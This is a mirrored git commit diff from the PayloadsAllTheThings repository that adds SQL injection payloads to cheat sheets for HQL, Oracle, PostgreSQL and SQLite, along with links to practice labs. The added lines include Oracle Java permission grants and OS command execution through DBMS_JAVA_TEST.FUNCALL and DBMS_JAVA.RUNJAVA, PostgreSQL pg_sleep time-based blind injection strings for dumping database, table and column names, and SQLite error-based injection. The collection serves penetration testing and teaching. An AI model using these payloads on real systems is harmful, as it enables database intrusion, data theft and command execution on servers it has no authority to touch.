gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-08 19:30:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into patch-4

Browse Source
This commit is contained in:
Swissky
2022-10-11 11:26:28 +02:00
committed by GitHub
parent 418285b7f6 77dc5e3ff1
commit 3f3736471e
78 changed files with 4696 additions and 366 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
SQL Injection/HQL Injection.md
View File

@@ -15,6 +15,8 @@
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
## HQL Comments
```sql
@@ -134,7 +136,7 @@ public class Constants {
Some usable constants in well-known Java libraries:
```
```ps1
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]

31
SQL Injection/OracleSQL Injection.md
View File

@@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
```
## Oracle SQL Command execution
## Oracle SQL Command Execution
* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
### Oracle Java Execution
* List Java privileges
```sql
select * from dba_java_policy
select * from user_java_policy
```
* Grant privileges
```sql
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
```
* Execute commands
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
```sql
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
```
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```
### Oracle Java Class
```sql
/* create Java class */
BEGIN
@@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)

33
SQL Injection/PostgreSQL Injection.md
View File

@@ -34,6 +34,16 @@
/**/
```
## PostgreSQL chain injection points symbols
```sql
; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
|| #or statement
# usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
```
## PostgreSQL Version
```sql
@@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la
```
## PostgreSQL Time Based
#### Identify time based
```sql
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
```
#### Database dump time based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
#### Table dump time based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### columns dump time based
```sql
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1
```
```sql
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))

7
SQL Injection/README.md
View File

@@ -612,6 +612,13 @@ Obfuscated query
1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2
```
## Labs
* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
## References
* Detect SQLi

8
SQL Injection/SQLite Injection.md
View File

@@ -10,6 +10,7 @@
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
* [Boolean - Extract info](#boolean---extract-info)
* [Boolean - Error based](#boolean---error-based)
* [Time based](#time-based)
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
@@ -77,6 +78,11 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```
## Boolean - Error based
```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```
## Time based
@@ -84,6 +90,7 @@ CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```
## Remote Command Execution using SQLite command - Attach Database
```sql
@@ -103,3 +110,4 @@ Note: By default this component is disabled
## References
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)